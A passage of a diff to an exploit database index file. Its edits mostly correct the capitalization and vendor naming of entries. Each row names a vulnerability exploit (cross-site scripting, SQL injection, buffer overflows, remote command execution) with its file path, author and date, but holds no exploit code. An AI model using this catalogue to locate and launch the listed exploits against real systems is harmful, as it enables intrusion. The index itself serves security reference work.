Portable 2.19.2 - Buffer Overflow ASLR bypass",2012-08-05,pole,windows,local,0 -20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - permissions File Manipulation",1995-03-02,"Larry Glaze",irix,local,0 +20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow ASLR Bypass",2012-08-05,pole,windows,local,0 +20263,platforms/irix/local/20263.txt,"IRIX 5.2/6.0 - Permissions File manipulation",1995-03-02,"Larry Glaze",irix,local,0 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request",2000-10-03,"BindView's Razor Team",windows,local,0 20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0 20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G - Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 - Indexed Directory Disclosure",2000-10-04,"David Litchfield",windows,remote,0 -20270,platforms/php/webapps/20270.txt,"Wordpress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps,0 +20270,platforms/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 & UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote,0 -20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 +20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 -20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Path Traversal",2000-07-18,pestilence,cgi,remote,0 +20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 - Directory Traversal",2000-07-18,pestilence,cgi,remote,0 20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,php,webapps,0 20279,platforms/cgi/remote/20279.txt,"extropia webstore 1.0/2.0 - Directory Traversal",2000-10-09,f0bic,cgi,remote,0 20280,platforms/cgi/remote/20280.txt,"bytes interactive Web shopper 1.0/2.0 - Directory Traversal",2000-10-08,f0bic,cgi,remote,0 -20281,platforms/cgi/remote/20281.txt,"hassan consulting shopping cart 1.18 - Directory Traversal",2000-10-07,f0bic,cgi,remote,0 +20281,platforms/cgi/remote/20281.txt,"hassan Consulting shopping cart 1.18 - Directory Traversal",2000-10-07,f0bic,cgi,remote,0 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos,0 -20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / Me - Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote,0 -20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / Me - Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 +20283,platforms/windows/remote/20283.txt,"Microsoft Windows 9x / ME - Share Level Password Bypass (1)",2000-10-10,stickler,windows,remote,0 +20284,platforms/windows/remote/20284.txt,"Microsoft Windows 9x / ME - Share Level Password Bypass (2)",2000-10-10,"Gabriel Maggiotti",windows,remote,0 20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 20286,platforms/php/remote/20286.c,"PHP 3.0/4.0 - Error Logging Format String",2000-10-12,anonymous,php,remote,0 20287,platforms/windows/remote/20287.c,"Nevis Systems All-Mail 1.1 - Buffer Overflow",2000-10-10,@stake,windows,remote,0 @@ -17633,7 +17634,7 @@ id,file,description,date,author,platform,type,port 20297,platforms/windows/remote/20297.rb,"Oracle AutoVue - ActiveX Control SetMarkupMode Buffer Overflow",2012-08-06,Metasploit,windows,remote,0 20302,platforms/windows/remote/20302.pl,"Microsoft IIS 4.0/5.0 and PWS Extended Unicode - Directory Traversal (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0 -20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 +20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0 20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0 @@ -17663,8 +17664,8 @@ id,file,description,date,author,platform,type,port 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 -20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute-Force",2000-10-29,Craig,windows,remote,0 -20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 +20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0 +20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 @@ -17674,27 +17675,27 @@ id,file,description,date,author,platform,type,port 20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 -20345,platforms/php/webapps/20345.txt,"iauto mobile application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 +20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0 20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0 20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0 20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 +20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - eval() Remote Code Execution",2012-08-08,Metasploit,php,remote,0 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential",2012-08-08,Metasploit,windows,remote,0 20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20358,platforms/php/webapps/20358.py,"Wordpress mini mail dashboard widget 1.42 Plugin - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20358,platforms/php/webapps/20358.py,"WordPress mini mail Dashboard widget 1.42 Plugin - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20360,platforms/php/webapps/20360.py,"Wordpress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 -20361,platforms/php/webapps/20361.py,"Wordpress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20360,platforms/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20361,platforms/php/webapps/20361.py,"WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20363,platforms/windows/webapps/20363.py,"surgemail 6.0a4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 +20363,platforms/windows/webapps/20363.py,"Surgemail 6.0a4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20364,platforms/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 -20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20365,platforms/php/webapps/20365.py,"WordPress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0 @@ -17727,7 +17728,7 @@ id,file,description,date,author,platform,type,port 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote,0 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0 -20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0 +20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos,0 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",multiple,dos,0 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent",2000-11-10,"Hugo Caye",windows,local,0 @@ -17745,7 +17746,7 @@ id,file,description,date,author,platform,type,port 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0 -20416,platforms/php/webapps/20416.txt,"Wordpress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 +20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 @@ -17759,22 +17760,22 @@ id,file,description,date,author,platform,type,port 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,jsp,remote,0 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote,0 20431,platforms/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read",2000-11-24,"Joao Gouveia",php,webapps,0 -20432,platforms/windows/dos/20432.txt,"Network Associates WebShield SMTP 4.5 - Invalid Outgoing Recipient Field Denial of Service",2000-11-23,"Jari Helenius",windows,dos,0 -20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - Metacharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 +20432,platforms/windows/dos/20432.txt,"Network Associates Webshield SMTP 4.5 - Invalid Outgoing Recipient Field Denial of Service",2000-11-23,"Jari Helenius",windows,dos,0 +20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - MetaCharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 -20436,platforms/unix/local/20436.sh,"Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 -20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 -20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 -20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 -20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 +20436,platforms/unix/local/20436.sh,"Apple Mac OS X 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0 +20437,platforms/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 +20438,platforms/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 +20439,platforms/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 +20440,platforms/windows/dos/20440.irc,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Full Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote,0 20442,platforms/cgi/remote/20442.html,"Greg Matthews - Classifieds.cgi 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Privilege Escalation (2)",2012-08-11,zx2c4,osx,local,0 -20444,platforms/cgi/remote/20444.txt,"Greg Matthews - Classifieds.cgi 1.0 Metacharacter",1998-12-15,anonymous,cgi,remote,0 -20445,platforms/windows/remote/20445.txt,"IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.BAT' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0 -20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation GuestBook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 -20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation GuestBook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20444,platforms/cgi/remote/20444.txt,"Greg Matthews - Classifieds.cgi 1.0 MetaCharacter",1998-12-15,anonymous,cgi,remote,0 +20445,platforms/windows/remote/20445.txt,"Microsoft IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1b - '.cmd' / '.CMD' Remote Command Execution",1996-03-01,anonymous,windows,remote,0 +20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 @@ -17787,7 +17788,7 @@ id,file,description,date,author,platform,type,port 20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_peekqueue Buffer Overflow",2000-12-01,@stake,windows,local,0 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0 -20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - PhoneBook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 +20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0 @@ -17801,16 +17802,16 @@ id,file,description,date,author,platform,type,port 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0 -20474,platforms/php/webapps/20474.txt,"Wordpress RSVPMaker 2.5.4 Plugin - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",php,webapps,0 +20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 Plugin - Persistent Cross-Site Scripting",2012-08-13,"Chris Kellum",php,webapps,0 20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 -20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - Cross-Site Request Forgery",2012-08-13,"Nir Valtman",windows,webapps,0 -20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 +20477,platforms/windows/webapps/20477.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Cross-Site Request Forgery",2012-08-13,"Nir Valtman",windows,webapps,0 +20478,platforms/windows/webapps/20478.txt,"IBM Websphere MQ File Transfer Edition Web Gateway - Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 -20485,platforms/osx/local/20485.sh,"OS X Viscosity OpenVPN Client - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 +20485,platforms/osx/local/20485.sh,"Viscosity OpenVPN Client (OS X) - Privilege Escalation",2012-08-13,zx2c4,osx,local,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - File System Disclosure",2000-12-07,Dodger,windows,remote,0 @@ -17827,7 +17828,7 @@ id,file,description,date,author,platform,type,port 20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management - Remote Execution",2012-08-15,Metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,cgi,remote,0 20504,platforms/cgi/remote/20504.html,"Leif M. Wright - ad.cgi 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote,0 -20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 - PIN Brute-Force",2000-12-14,@stake,palm_os,local,0 +20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 - PIN Brute Force",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote,0 20507,platforms/multiple/remote/20507.txt,"alex heiphetz Group eZshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 @@ -17845,12 +17846,12 @@ id,file,description,date,author,platform,type,port 20520,platforms/solaris/local/20520.pl,"Solaris 2.x/7.0/8 catman - Race Condition (1)",2000-11-21,"Vapid Labs",solaris,local,0 20521,platforms/solaris/local/20521.pl,"Solaris 2.x/7.0/8 catman - Race Condition (2)",2000-11-21,"Vapid Labs",solaris,local,0 20522,platforms/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' Function File Disclosure",2000-12-23,bt,cgi,remote,0 -20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 +20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote,0 20526,platforms/unix/local/20526.c,"GTK+ 1.2.8 - Arbitrary Loadable Module Execution",2001-01-02,V9,unix,local,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote,0 -20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - Javascript URL",2001-01-01,"Georgi Guninski",windows,remote,0 +20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - JavaScript URL",2001-01-01,"Georgi Guninski",windows,remote,0 20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal (1)",2001-01-15,"Michael Smith",multiple,remote,0 20530,platforms/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal (2)",2001-01-05,"Georgi Guninski",multiple,remote,0 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0 @@ -17864,7 +17865,7 @@ id,file,description,date,author,platform,type,port 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload",2012-08-15,ICheer_No0M,php,webapps,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)",2012-08-21,Kc57,linux,webapps,0 20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 -20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 +20705,platforms/multiple/dos/20705.py,"sap NetWeaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 20544,platforms/php/webapps/20544.txt,"xt:Commerce 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 @@ -17873,12 +17874,12 @@ id,file,description,date,author,platform,type,port 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai 